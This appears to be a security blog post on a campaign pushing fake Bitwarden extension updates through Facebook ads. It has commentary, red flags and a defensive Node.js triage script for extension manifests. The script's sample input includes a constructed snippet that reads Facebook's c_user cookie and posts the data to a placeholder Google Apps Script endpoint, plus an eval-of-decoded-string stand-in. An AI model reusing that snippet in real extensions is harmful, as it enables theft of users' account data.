Social Media And Browser Extensions: The One-Two Punch Online Criminals Prefer

TechRadar reports on a cyberattack campaign, uncovered by Bitdefender, in which criminals distribute fake Bitwarden security updates through deceptive Facebook advertisements.

The ads mimic legitimate Bitwarden branding and manufacture urgency with warnings such as "Your Passwords Are at Risk!" to lure users into clicking. Clicking the ad sends the user through several redirecting URLs to a phishing page that closely resembles the official Chrome Web Store.

Instead of installing an extension from the store, the page prompts the user to download a ZIP file and load it manually as an unpacked extension with Chrome's Developer mode turned on.

Sideloading this way bypasses the Chrome Web Store's review and install checks, so nothing vets the broad permissions the malicious extension requests: access to all websites, network requests, storage, and cookies.

Once installed, the extension targets Facebook users by reading the "c_user" cookie, which holds the user's Facebook ID. A background script then harvests additional data, such as location and IP address, leveraging Facebook's Graph API, and exfiltrates the stolen information to a command-and-control server hosted via Google Script.

Bitdefender, the cybersecurity firm that uncovered the campaign, warns that the malware is capable of stealing both personal and financial data from individuals and businesses.

They advise users and IT teams to be vigilant about browser extensions that request excessive permissions or contain obfuscated code, particularly those interacting with Facebook's Graph API.

The campaign highlights the growing trend of using social media platforms as vectors for malware distribution and the importance of verifying the authenticity of software updates and browser extensions before installation.

Source: https://www.techradar.com/pro/hackers-pushing-fake-bitwarden-updates-hit-thousands-of-devices-with-data-stealing-malware

Commentary

Online criminals are increasingly exploiting social media platforms because they offer a vast and easily accessible pool of potential victims.

These platforms are designed to foster trust and engagement, which makes users more likely to click on links or interact with content that appears familiar or urgent.

By using paid advertisements or hijacked accounts, attackers can distribute malicious content that mimics legitimate brands or services, such as password managers or browser extensions.

The social nature of these platforms also means that malicious links can spread quickly through shares, likes, or comments, amplifying the reach of the attack with minimal effort.

Browser extensions are a favored tool for online criminals because they run with elevated privileges inside the browser.

Once installed, a malicious extension can access sensitive data such as login credentials, cookies, browsing history, and even manipulate web content. These characteristics are ideal for stealing personal and financial information or for conducting surveillance.

Extensions installed from a store update automatically, and even a sideloaded one can fetch new instructions from a server, so an extension's behavior can change after installation without the user's knowledge. The fact that many users are unfamiliar with how browser extensions work or what their permissions actually grant makes them an attractive vector for malware distribution.

There are several red flags that can indicate a browser extension is malicious. One major warning sign is if the extension asks for excessive permissions that seem unrelated to its stated function, such as access to all websites, clipboard data, or the ability to read and change data on visited sites.

Another red flag is if the extension must be installed manually in developer mode, which bypasses the usual security checks of official browser stores. Obfuscated or minified code, lack of a clear privacy policy, and poor or no user reviews are also indicators of potential risk.
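As an added example (not code from the article, TechRadar or Bitdefender), the following Node.js script turns the red flags above, together with the permission set and endpoints described in the report, into a triage check over an extension's manifest.json and its scripts. The sample manifest, the script text, the line-length threshold and the function names (triageExtension and its helpers) are constructed for this illustration; the script is a review aid for IT teams looking at a sideloaded extension, not a substitute for store review or sandboxed analysis.

```javascript
// Added example, not code from the article or from Bitdefender/TechRadar:
// a triage script that applies the red flags above to an extension's
// manifest and scripts. The manifest, the script text, the thresholds and
// the function names below are constructed for this illustration.

// Host patterns that grant access to every website.
const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

// Permissions worth questioning when unrelated to the extension's stated job.
const SENSITIVE_PERMISSIONS = {
  cookies: "read session cookies (for example Facebook's c_user)",
  webRequest: "observe network requests",
  webRequestBlocking: "block or modify network requests",
  declarativeNetRequest: "rewrite network requests",
  storage: "persist harvested data locally",
  scripting: "inject scripts into pages",
  tabs: "read URLs and titles of open tabs",
  clipboardRead: "read the clipboard",
  history: "read browsing history",
};

function flagPermissions(manifest) {
  const findings = [];
  const perms = manifest.permissions || [];
  // Manifest V2 listed host patterns under "permissions"; V3 uses "host_permissions".
  const hosts = [...(manifest.host_permissions || []), ...perms];
  for (const h of hosts) {
    if (BROAD_HOSTS.has(h)) findings.push(`broad host access: ${h}`);
  }
  for (const p of perms) {
    if (SENSITIVE_PERMISSIONS[p]) findings.push(`permission ${p}: ${SENSITIVE_PERMISSIONS[p]}`);
  }
  return findings;
}

// Cheap heuristics over script text: minification/obfuscation markers,
// dynamic code execution, programmatic cookie reads, and the endpoints
// named in the report (Facebook Graph API, Google Apps Script).
function flagSource(name, src) {
  const findings = [];
  const longest = Math.max(...src.split("\n").map((l) => l.length));
  if (longest > 500) findings.push(`${name}: ${longest}-char line (minified or obfuscated)`);
  if (/\beval\s*\(|new Function\s*\(|String\.fromCharCode|\batob\s*\(/.test(src)) {
    findings.push(`${name}: dynamic code or decoding primitives`);
  }
  if (/chrome\.cookies\.get/.test(src)) findings.push(`${name}: reads cookies programmatically`);
  if (/graph\.facebook\.com/.test(src)) findings.push(`${name}: contacts Facebook Graph API`);
  if (/script\.google\.com/.test(src)) findings.push(`${name}: contacts a Google Apps Script endpoint`);
  return findings;
}

// Verdict: all-sites access combined with the cookies permission is the
// pattern described above, so it is treated as a blocker, not a review item.
function triageExtension(manifest, scripts) {
  const findings = flagPermissions(manifest);
  for (const [name, src] of Object.entries(scripts)) findings.push(...flagSource(name, src));
  const broad = findings.some((f) => f.startsWith("broad host access"));
  const cookies = findings.some((f) => f.startsWith("permission cookies"));
  const verdict = broad && cookies ? "BLOCK" : findings.length > 0 ? "REVIEW" : "OK";
  return { verdict, findings };
}

// Constructed sample input: a lookalike manifest plus two constructed scripts.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Bitwarden Security Update",
  permissions: ["cookies", "webRequest", "storage", "tabs"],
  host_permissions: ["<all_urls>"],
  background: { service_worker: "bg.js" },
};

const SAMPLE_SCRIPTS = {
  "bg.js": [
    "chrome.cookies.get({ url: 'https://www.facebook.com', name: 'c_user' }, (c) => {",
    "  fetch('https://graph.facebook.com/' + c.value).then((r) => r.json())",
    "    .then((d) => fetch('https://script.google.com/macros/s/EXAMPLE/exec', { method: 'POST', body: JSON.stringify(d) }));",
    "});",
  ].join("\n"),
  // Stand-in for a packed payload: one very long line that is decoded and eval'd.
  "obf.js": "var _0x = '" + "A".repeat(600) + "'; eval(atob(_0x));",
};

const REPORT = triageExtension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS);
console.log(JSON.stringify(REPORT, null, 2));
```

Run it with a copy of the unpacked extension's manifest.json and script files substituted for the constructed sample; a BLOCK verdict means the extension both reaches every site and can read cookies, which is exactly the combination the campaign needed to lift the c_user cookie. The heuristics are deliberately simple and will miss payloads fetched at runtime, so treat REVIEW as a prompt for manual inspection rather than a clean bill of health.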

The final takeaway is that users should be cautious of extensions promoted through unofficial channels, and of extensions that mimic well-known brands but are not linked from the brand's official website.
